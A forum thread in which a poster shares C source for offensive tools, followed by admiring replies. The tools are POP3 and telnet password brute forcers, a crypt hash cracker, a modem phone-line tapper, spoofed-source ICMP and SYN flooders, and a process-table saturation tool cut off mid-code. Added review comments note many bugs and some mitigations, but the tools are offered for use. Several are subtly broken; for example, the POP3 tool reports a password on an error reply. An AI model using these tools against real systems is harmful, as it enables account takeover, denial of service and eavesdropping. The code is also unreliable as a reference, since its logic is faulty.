-=POP3 Brute=- POP3 protocol brute forcer.

CODE

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
/* Pop3 Brute: dictionary attack on one POP3 login over a single connection.
 * Reads host, login and wordlist path from stdin, connects once to port 110
 * (the comment below explains why only once), then for each word sends USER
 * and PASS and reports the word when the reply contains "-ERR".
 * Returns 0 in both outcomes.
 *
 * Server side this is one long-lived connection carrying many USER/PASS
 * pairs from one source; per-connection failure counters, per-account
 * lockout and forced disconnect after N failures are the usual mitigations,
 * and hundreds of PASS commands on one session is itself a strong signal.
 *
 * NOTE(review): recv(sock, recvbuf, strlen(recvbuf), 0) sizes the read by
 * strlen() of a buffer that is never initialised or terminated — the length
 * is indeterminate and can exceed the buffer.
 * NOTE(review): scanf("%s")/fscanf("%s") have no width limit for dhost[20],
 * login[15], dict[15] and wordbuf[15]. fopen(dict, "rw") is not a standard
 * mode string. The while(!feof()) loop handles the last word twice.
 * sleep()/strlen()/close() are used without <unistd.h>/<string.h>. */
int main() {
       int sock;
       char dhost[20];
       char login[15];
       char dict[15];
       char wordbuf[15];
       char userbuf[25];
       char passbuf[25];
       char recvbuf[1024];
       FILE *wordlist;
       struct sockaddr_in dest;
       struct hostent *host;
       printf("Pop3 Brute, POP3 Brute forcer - By shaunige@yahoo.co.uk\n\n");
       printf("Host: ");
       scanf("%s", dhost);
       printf("Login: ");
       scanf("%s", login);
       printf("Wordlist: ");
       scanf("%s", dict);
       if((host = gethostbyname(dhost)) == NULL) {
               printf("Couldn't resolve %s!\n", dhost);
               exit(-1);
       }

       if((wordlist = fopen(dict, "rw")) == NULL) {
               printf("Couldn't open %s!\n", dict);
               exit(-1);
       }

       sprintf(userbuf, "USER %s\n", login);
       if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
               printf("Couldn't make socket!\n");
               exit(-1);
       }

       dest.sin_family = AF_INET;
       dest.sin_port = htons(110);
       dest.sin_addr = *((struct in_addr *)host->h_addr);

       /* We only connect once, because POP3 never disconnects you after
        * bad password attempts */
       if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
               printf("Couldn't connect to %s on port 110!\n", dhost);
               exit(-1);
       }
       sleep(2);
       /* Greeting banner is read (with the indeterminate length noted above) and discarded. */
       recv(sock, recvbuf, strlen(recvbuf), 0);
       while(!feof(wordlist)) {
               fscanf(wordlist, "%s", wordbuf);
               sprintf(passbuf, "PASS %s\n", wordbuf);
               printf("Trying: %s\n", wordbuf);
               send(sock, userbuf, strlen(userbuf), 0);
               recv(sock, recvbuf, strlen(recvbuf), 0);
               send(sock, passbuf, strlen(passbuf), 0);
               recv(sock, recvbuf, strlen(recvbuf), 0);
               if(strstr(recvbuf, "-ERR") != NULL) {
                       printf("Password is: %s\n", wordbuf);
                       return(0);
               }
       }
       close(sock);
       fclose(wordlist);
       printf("Password not found!\n");
       return(0);
}



-=TelnetBrute=- Quick zyxtel router telnetd brute forcer.

CODE

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
/* Brute 1.0: dictionary attack against a telnet login on port 23 (the
 * heading says it targets a ZyXEL router telnetd).
 * Reads host, login and wordlist path from stdin; per word it opens a new
 * connection, sends the login and the word with no prompt handling (as the
 * comment below admits) and reports a hit when the reply contains `prompt`.
 * Returns 0 in both outcomes.
 *
 * Server side this is a burst of short telnet sessions from one source, each
 * with a single failed login — telnetd auth logs and per-source rate
 * limiting catch it; disabling telnet in favour of SSH removes the plaintext
 * login altogether.
 *
 * NOTE(review): `char prompt[1] = "$"` has no terminating NUL, so strstr()
 * reads past the array. send(sock, login, sizeof(pwdbuf), 0) sends 20 bytes
 * from the 10-byte `login`, and sizeof(pwdbuf) bytes are sent for the
 * password rather than its length. getbuf is never terminated before
 * strstr(); recv()/fscanf() results are unchecked; scanf("%s") has no width
 * limit for dhost[20]/dict[20]/login[10]. `nl` is unused.
 * system("clear") spawns a shell; sleep()/close()/strstr() are used without
 * <unistd.h>/<string.h>. */
int main() {
       int sock;
       FILE *pwdlist;
       char getbuf[50];
       char pwdbuf[20];
       char dhost[20];
       char dict[20];
       char login[10];
       char nl[2] = "\n";
       char prompt[1] = "$"; /* Change this to "#" if you are cracking root. */
       struct sockaddr_in dest;
       struct hostent *host;
       system("clear");
       printf("Brute 1.0, Telnet brute forcer - shaunige@yahoo.co.uk\n\n");
       printf("Host: ");
       scanf("%s", dhost);
       printf("Login to brute force: ");
       scanf("%s", login);
       printf("Dictionary File: ");
       scanf("%s", dict);
       if((host = gethostbyname(dhost)) == NULL) {
               printf("Couldn't resolve %s!\n", dhost);
               exit(-1);
       }

       if((pwdlist = fopen(dict, "r")) == NULL) {
               printf("Couldn't find %s!\n", dict);
               exit(-1);
       }

       while(!feof(pwdlist)) {
               if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                       printf("Couldn't make socket!\n");
                       exit(-1);
               }

               dest.sin_family = AF_INET;
               dest.sin_port = htons(23);
               dest.sin_addr = *((struct in_addr *)host->h_addr);
               fscanf(pwdlist, "%s", pwdbuf);
               printf("Trying: %s.\n", pwdbuf);
               if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
                       printf("Couldn't connect to %s on port 23!\n", dhost);
                       exit(-1);
               }
               /* I didn't bother checking for a login or password prompt here.*/
               send(sock, login, sizeof(pwdbuf), 0);
               recv(sock, getbuf, sizeof(getbuf), 0);
               sleep(1);
               send(sock, pwdbuf, sizeof(pwdbuf), 0);
               recv(sock, getbuf, sizeof(getbuf), 0);
                       if(strstr(getbuf, prompt) != NULL) {
                               printf("Password is: %s!\n", pwdbuf);
                               fclose(pwdlist);
                               close(sock);
                               return(0);
                       }
               close(sock);
               }
               printf("Password not found!\n");
 fclose(pwdlist);
 return(0);
}



-=RootCrack=- Minimalistic UNIX password cracker.

CODE

/* Compile: gcc rootcrack.c -o rootcrack -lcrypt
* Usage: ./rootcrack wordlist.txt, then enter the encrypted password string.
*/

#include <crypt.h>
#include <stdio.h>
#include <stdlib.h>
/* Rootcrack: offline dictionary attack on one crypt(3) hash.
 * argv[1] is the wordlist; the hash is read from stdin. For each word,
 * crypt() it with the hash's first two characters as the salt (the
 * traditional crypt(3) convention) and compare the result with the hash.
 * Returns 0 whether or not a match is found.
 * Defensive relevance: hashes must stay unreadable to ordinary users
 * (shadowed) and use a slow, salted algorithm; against traditional DES
 * crypt a wordlist run like this finishes quickly.
 *
 * NOTE(review): scanf("%s", pwd) and fscanf("%s", wordbuf) have no width
 * limit for pwd[25]/wordbuf[10]. fopen(argv[1], "rw") is not a standard
 * mode string. strcmp() is used without <string.h>; the while(!feof()) loop
 * handles the last word twice; the wordlist is never fclose()d.
 * system("clear") spawns a shell. */
int main(int argc, char *argv[]) {
       if(argc < 2) {
       system("clear");
       printf("Usage: rootcrack <wordlist>\n");
       printf("Rootcrack was written by shaunige@yahoo.co.uk\n");
       exit(-1);
       }

       FILE *wordlist;
       char salt[3];
       char pwd[25];
       char wordbuf[10];
       char *encrypt;
       printf("Enter encrypted password: "); // Get the encrypted password.
       scanf("%s", pwd);
       if((wordlist = fopen(argv[1], "rw")) == NULL) { // Open the wordlist.
               printf("Couldn't find wordlist!\n");
               exit(-1);
       }

       /* Run through each word in the wordlist, encrypting, and then comparing
        * it to the encrypted password string. */
       while(!feof(wordlist)) {
               fscanf(wordlist, "%s", wordbuf);
               /* Salt is recomputed every iteration although pwd never changes. */
               salt[0] = pwd[0];
               salt[1] = pwd[1];
               salt[2] = '\0';
               encrypt = (char *) crypt(wordbuf, salt);

               /* Check to see if the strings match */
               if(strcmp(pwd, encrypt) == 0) {
                       /* We've cracked the password! */
                       printf("Password is: %s\n", wordbuf);
                       printf("Salt: %s\n", salt);
                       return(0);
               }
       }
       printf("Password not found!\n");
       return(0);
}



-=RootCrypt-= Simple little XOR encryptor.

CODE

#include <stdio.h>
#include <stdlib.h>
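/* Rootcrypt: transform argv[1] into argv[2] one byte at a time.
 * Each input byte c becomes (c + 10) ^ 195 — that is what the original
 * expression `c + 10 ^ 65 * 3` means under C precedence ('*' then '+' bind
 * tighter than '^') — and is stored by putc() as an unsigned char.
 * This is obfuscation, not encryption: there is no key and the mapping is
 * fixed, so it provides no confidentiality. The transform is also not its
 * own inverse, so this program cannot undo its own output.
 * Returns 0 on success; exits with -1 on bad usage or a file error.
 */
int main(int argc, char *argv[]) {
       int c;
       FILE *in;
       FILE *out;

       if(argc < 3) {
               printf("Usage: %s <infile> <outfile>\n", argv[0]);
               printf("Rootcrypt was written by shaunige@yahoo.co.uk\n");
               exit(-1);
       }

       /* "rb"/"wb": the original used "rw", which is not a standard fopen()
        * mode string (glibc ignores the unknown 'w' and opens read-only);
        * binary mode keeps every byte intact on platforms that translate
        * line endings in text mode. */
       if((in = fopen(argv[1], "rb")) == NULL) {
               printf("Couldn't find file %s!\n", argv[1]);
               exit(-1);
       }

       if((out = fopen(argv[2], "wb")) == NULL) {
               printf("Couldn't create file!\n");
               fclose(in);   /* the original leaked the input handle on this path */
               exit(-1);
       }

       while((c = getc(in)) != EOF) {
               c = (c + 10) ^ (65 * 3);   /* same value as the original; parenthesised for readability */
               putc(c, out);
       }

       fclose(in);
       /* fclose() performs the final flush; an unreported failure here would
        * leave a silently truncated output file. */
       if(fclose(out) != 0) {
               printf("Couldn't write file %s!\n", argv[2]);
               exit(-1);
       }
       printf("File encrypted!\n");
       return(0);
}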



-=RootTap=- Simple phone tapper. Taps line that modem is connected to.

CODE

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
/* May need to change this */
#define MODEM_PORT "/dev/modem"
/* Roottap: turn the modem's speaker on and take the line off-hook so that
 * audio on the attached phone line is audible through the modem.
 * Sends ATM3 (speaker on) and ATH1 (off-hook), as the prompts say, then
 * sleeps 50 s and falls off the end of main() (implicit return 0 in C99).
 *
 * NOTE(review): open() returns -1 on failure, not NULL, so a missing
 * MODEM_PORT is not detected and the write() calls fail unchecked.
 * system("clear") spawns a shell. sprintf() output length is assumed to be
 * 5 bytes by the write() calls. exit()/sleep()/write() are used without
 * <stdlib.h>/<unistd.h>. */
int main() {
       int modemfd;
       char modembuf[15];
       system("clear");
       printf("Roottap was written by shaunige@yahoo.co.uk\n");
       printf("Roottap will tap the phone line your modem is connected to\n\n");
       if((modemfd = open(MODEM_PORT, O_RDWR | O_NOCTTY | O_NDELAY)) == NULL) {
               printf("Couldn't open modem\n");
               exit(-1);
       }

       printf("Turning modem speaker on...\n");
       sprintf(modembuf, "ATM3\r");
       sleep(1);
       write(modemfd, modembuf, 5);
       printf("Taking the modem off the hook\n");
       sprintf(modembuf, "ATH1\r");
       sleep(1);
       write(modemfd, modembuf, 5);
       printf("Phone line tapped!\n");
       sleep(50);
}



-=PingFlood=- Simple ping flooder for performance testing of systems, network devices, routers etc...

CODE

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
/* PingFlood: send ICMP echo requests to argv[1] as fast as possible from
 * four processes (two fork() calls) on a raw socket, until killed.
 * Needs root for SOCK_RAW (the error text says so). The while(1) never
 * exits, so return(0) is unreachable.
 *
 * NOTE(review): `(struct icmp *) packet + sizeof(struct iphdr)` is pointer
 * arithmetic in units of sizeof(struct icmp), not bytes, so `icmp` points
 * far past the IP header (and the cast type differs from the declared
 * icmphdr).
 * NOTE(review): ip->saddr = htons("1.3.3.7") hands a string pointer to
 * htons(), and ip->daddr = inet_ntoa(...) assigns a char * to an integer
 * field — neither is an address conversion. packet[] is otherwise
 * uninitialised stack memory, no checksum is computed, tot_len is not in
 * network byte order, and no IP_HDRINCL is set — on Linux the kernel then
 * prepends its own IP header and the hand-built one goes out as payload
 * (confirm against raw(7)).
 * inet_ntoa()/socket()/sendto() are used without <arpa/inet.h>/<sys/socket.h>.
 * Defensive view: a spoofed-source ICMP flood is addressed by ingress
 * filtering (BCP 38) at the network edge and ICMP rate limiting on the
 * target. */
int main(int argc, char *argv[]) {
       if(argc < 2) {
               printf("Usage: %s <host>\n", argv[0]);
               exit(0);
       }

       int sock;
       char packet[5000];
       char r[5000];
       struct sockaddr_in dest;
       struct hostent *host;
       struct iphdr *ip = (struct iphdr *) packet;
       struct icmphdr *icmp = (struct icmp *) packet + sizeof(struct iphdr);
       if((host = gethostbyname(argv[1])) == NULL) {
               printf("Couldn't resolve host!\n");
               exit(-1);
       }

       if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {
               printf("Couldn't make socket!\n");
               printf("You must be root to create a raw socket.\n");
               exit(-1);
       }

       dest.sin_family = AF_INET;
       dest.sin_addr = *((struct in_addr *)host->h_addr);
       ip->ihl = 5;
       ip->id = htons(1337);
       ip->ttl = 255;
       ip->tos = 0;
       ip->protocol = IPPROTO_ICMP;
       ip->version = 4;
       ip->frag_off = 0;
       ip->saddr = htons("1.3.3.7");
       ip->daddr = inet_ntoa(dest.sin_addr);
       ip->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr);
       ip->check = 0;
       icmp->checksum = 0;
       icmp->type = ICMP_ECHO;
       icmp->code = 0;
       printf("Ping flooding %s!\n", argv[1]);
       /* Two unconditional fork()s: the parent and three children all enter the loop. */
       fork();
       fork();
       while(1) {
               sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(struct sockaddr));
       }
       return(0);
}



-=SynFlood=- Useful for performance testing. Packet loss may occur, due to missing checksum.

CODE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>
/* Synflooder: send hand-built TCP SYNs to argv[1]:argv[2] from four
 * processes (two fork() calls) on a raw socket until killed. Needs root for
 * SOCK_RAW. The TCP checksum is left at 0 — the heading acknowledges the
 * resulting packet loss. return(0) is unreachable after while(1).
 *
 * NOTE(review): `(struct tcphdr *) packet + sizeof(struct iphdr)` advances by
 * sizeof(struct iphdr) tcphdr-sized elements, not bytes, so the TCP fields
 * are written well past the IP header. ip->daddr = inet_ntoa(...) assigns a
 * char * to an integer field. tcp->seq = htons(random()) truncates the
 * 32-bit sequence number. tot_len is not in network byte order, and no
 * IP_HDRINCL is set — on Linux the kernel then prepends its own IP header
 * and the hand-built one goes out as payload (confirm against raw(7)).
 * memset()/inet_addr()/inet_ntoa() are used without <string.h>/<arpa/inet.h>.
 * Defensive view: SYN cookies and backlog tuning on the target, and BCP 38
 * ingress filtering upstream for the spoofed 127.0.0.1 source. */
int main(int argc, char *argv[]) {
       if(argc < 3) {
               printf("Usage: %s <host> <port>\n", argv[0]);
               printf("Synflooder v1.7 was written by shaunige@yahoo.co.uk\n");
               exit(-1);
       }

       int sock;
       char packet[4096]; /* Datagram. */
       struct sockaddr_in dest;
       struct iphdr *ip = (struct iphdr *) packet;
       struct tcphdr *tcp = (struct tcphdr *) packet + sizeof(struct iphdr);
       struct hostent *he;
       if((he = gethostbyname(argv[1])) == NULL) {
               printf("Couldn't resolve hostname!\n");
               exit(-1);
       }

       if((sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) {
               printf("Socket failed!\n");
               printf("Must be root to make raw socket.\n");
               exit(-1);
       }
       dest.sin_family = AF_INET;
       dest.sin_port = htons(atoi(argv[2]));
       dest.sin_addr = *((struct in_addr *)he->h_addr);
       memset(packet, 0, 4096); // Zero out packet.

       // Fill in IP headers.
       ip->ihl = 5;
       ip->version = 4;
       ip->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
       ip->id = htons(1337);
       ip->saddr = inet_addr("127.0.0.1");
       ip->daddr = inet_ntoa(dest.sin_addr);
       ip->ttl = 255;
       ip->protocol = 6;
       ip->check = 0;
       ip->tos = 0;
       ip->frag_off = 0;

       // Fill in TCP headers.
       tcp->source = htons(1337);
       tcp->dest = htons(atoi(argv[2]));
       tcp->seq = htons(random());
       tcp->ack = 0;
       tcp->syn = 1;
       tcp->window = htons(65535);
       tcp->check = 0;
       tcp->doff = 5;
       tcp->rst = 0;
       tcp->psh = 0;
       tcp->fin = 0;
       tcp->urg = 0;
       tcp->ack_seq = htons(0);
       printf("Syn flooding: %s!\n", argv[1]);
       /* Insert some more fork()'s in here, if you want. */
       fork();
       fork();
       while(1) {
       sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(struct sockaddr));
       }
       return(0);
}



-=PNuke=- A simple program, similar to Octopus.c in function. A process table saturation attack, if you want to test network performance.

CODE

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define MAX_CON 1025 /* You may have to change this, depending on your OS */
int main(int argc, char *argv[]) {
       if(argc < 3) {
               printf("Usage: %s <host
ComSec
wow...out of this world....

that's an excellent start to a new forum by 2 good programmers...i can see this forum taking off good style wink.gif

it would be great to see these programs compiled and running in Windows

and how the code was altered to run as an Win app.. just a thought

many thanks guys.... biggrin.gif

shaun2k2
Hehe, thanks.

There's actually not many things you'd need to change on most. You'd need to alter the header files (the ones with #include at the front), and for the socket programs (network programs) you'd need to add a few lines of code to initialise Winsock.

I will post instructions tomorrow, I'm tired, going to bed smile.gif.


Thank you for your time.
Shaun.
Dillinja
Amazing!!!

Excellent stuff Shaun! How long you been coding?
ComSec
thanks to you shaun2k2 for providing your code for our members to digest smile.gif

am i glad this forum was created...always wanted my own scanner with a gui and my exploits ....perhaps i might get the chance now biggrin.gif biggrin.gif
OneNight
Very good post Shaun. I think i'll be trying some of these out when i finally get the chance to dual boot linux.

Thx.
w00dy
With this new forum and such great content, i spose i better go digging in my code vault and post some too. smile.gif Great job shaun

If i find time tomorrow nite, i will compile these on freebsd and post them in the file downloads and leave the link here. I just have to find time to write a report for my boss on the Local Loop that he let go to shit. Only about 5000 customers lost phone sad.gif

PS Going from 3mbit to 56kbit BLOWS!!!!!!!!!
shaun2k2
Thanks guys.

dillinja, well, I'm 14 now, so I've been coding since I was 12 or 13, but only around a year seriously. The other time I just messed about with code.

Yeah, it would be really good if we got a whole bunch of our security/hacking programs together, everyone, post yer code smile.gif.

ComSec, sweet, if you need help I can help with that! My friend wrote a GUI port scanner, I'll get you the code! smile.gif

www.wxwindows.com


Thank you for your time.
Shaun.

ComSec
QUOTE
ComSec, sweet, if you need help I can help with that! My friend wrote a GUI port scanner, I'll get you the code!


yeah...look forward to it

QUOTE
I'm 14
you're joking! if you are, you're going places wink.gif

shaun2k2
Thanks.

Cool, I'm going places smile.gif.

-Shaun.
andariel
QUOTE
I'm 14 now

I feel dumb. lol
Nice post shaun, that encouraged me to make my MicroScanner 2.0 open source.
t0bban
I admire you shaun tongue.gif
I'm a programmer too, but not as experienced it seems, just been playing around with different stuff, made a few chatprogs etc etc.
Started with official Microsoft C# courses now too heh..
This encouraged me to pick up the ol' programming books.
Hope to see more of your code, as you will see mine when I've done something tongue.gif
Hexboy
Nice code ,man . I'm going to create a thread of the one ( 1 ) useful program i've made
shaun2k2
Thanks guys.


-Shaun.
jmeyer5
thanks for posting

http://www.myprograms.org
niko.noname
10x thanks for posting
biboupoki
thanx a lot for this tools
